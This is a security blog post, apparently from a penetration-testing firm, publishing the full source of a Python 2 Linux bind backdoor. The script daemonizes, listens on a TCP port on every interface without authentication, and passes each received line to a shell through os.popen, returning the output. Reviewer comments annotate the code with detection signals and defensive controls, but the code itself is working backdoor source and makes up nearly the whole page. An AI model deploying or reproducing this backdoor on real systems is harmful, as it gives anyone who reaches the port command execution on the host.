Bind Backdoor for Linux

#!/usr/bin/python
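#Info : This is a Linux-based bind backdoor: it listens on a TCP port and
# runs each line it receives as a shell command. This is NOT an interactive shell!
# The listener has no authentication and no encryption, so any host that can
# reach the port gets command execution as the user who started the script.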
#Author : otoy
#Date : 0x102010
#Blog : otoyrood.wordpress.com

import socket,sys,os,re

def daemonize():
# Detach from the launching shell with a single fork: the parent
# (pid != 0) exits immediately and only the child carries on into main().
# NOTE(review): the page's extraction dropped the indentation; the lines
# below are the function body.
# Only fork() is used here; no setsid(), second fork, or stdio redirection
# appears in this listing.
# Defender note: the resulting process is an orphaned Python interpreter
# whose original parent has already exited, which is a useful triage signal
# when it also owns a listening socket.
pid = os.fork()
if(pid != 0):
os._exit(0)

def main():
# Bind a TCP listener on the port given in argv[1], accept one client, and
# loop: send a prompt string, read one command, run it through os.popen(),
# and send the captured output back over the same socket.
# NOTE(review): the page's extraction dropped the indentation; the comments
# describe the structure the statements imply.
# Python 2 syntax (print statement; str passed directly to send()).
#
# Security-relevant properties visible in this listing:
#   * no authentication or access check before commands are executed;
#   * traffic is plaintext, so commands and output are visible on the wire;
#   * commands run with the privileges of whoever launched the script.
# Defender note: the observable footprint is a Python process holding a
# listening TCP socket on an unexpected port and spawning shell children.
# Listener audits, process-ancestry/exec logging, and default-deny inbound
# filtering on hosts are the controls that catch or neutralise this pattern.
if len(sys.argv) < 2:
print "Usage:",sys.argv[0],"<port>"
sys.exit(1)
# Collected once at start-up and used only to build the prompt text.
UID = os.getlogin()
CWD = os.getcwd()
STM = os.uname()
# Cosmetic prompt suffix chosen from the login name, not from the effective UID.
if UID == 'root':
SIGN = ' # '
else:
SIGN = ' $ '
ls = socket.socket(socket.AF_INET,socket.SOCK_STREAM);
port = int(sys.argv[1])
# Empty host string binds on every IPv4 interface, not just loopback.
ls.bind(('', port))
ls.listen(1)
# accept() is called exactly once: a single client session per run.
(conn, addr) = ls.accept()
try:
while (1):
# Prompt is login@nodename:cwd followed by SIGN (STM[1] is the uname nodename).
bdsh = UID+'@'+STM[1]+':'+CWD+SIGN
conn.send(bdsh)
# One recv() of at most 1024 bytes is treated as one complete command.
pktcmd = conn.recv(1024)
rcmd = pktcmd.strip()
# 'cd <dir>' is handled in this process with os.chdir(); a directory
# change made inside the popen() child would not persist.
cdir = re.findall('cd (.*)',rcmd)
try:
os.chdir(cdir[0])
CWD = os.getcwd()
except OSError:
conn.send('No such file or directory: '+cdir[0])
except IndexError:
# No 'cd ' match in the command: nothing to change.
pass
if rcmd == 'quit':
conn.close()
sys.exit(1)
elif rcmd == '':
rcmd = 'echo " "'
# Network-supplied text goes to os.popen() unmodified, i.e. to a shell.
# This is the remote command execution primitive of the script.
lcmd = os.popen(rcmd)
cmdstr = lcmd.read().strip()
conn.send(cmdstr+'n')
except(socket.error):
# Any socket error ends the session and the process.
conn.close()
sys.exit(1)

if __name__ == '__main__':
# Script entry point: fork into the background first, then start the
# listener in the surviving child. Ctrl-C during start-up exits with status 1.
try:
daemonize()
main()
except(KeyboardInterrupt):
sys.exit(1)

in action:


About Spentera

We specialize in penetration testing, vulnerability assessment, computer forensics, intrusion analysis and malware analysis. Customers can contact us directly at contact[at]spentera[dot]id, or use the Contact Our Team menu on the sidebar.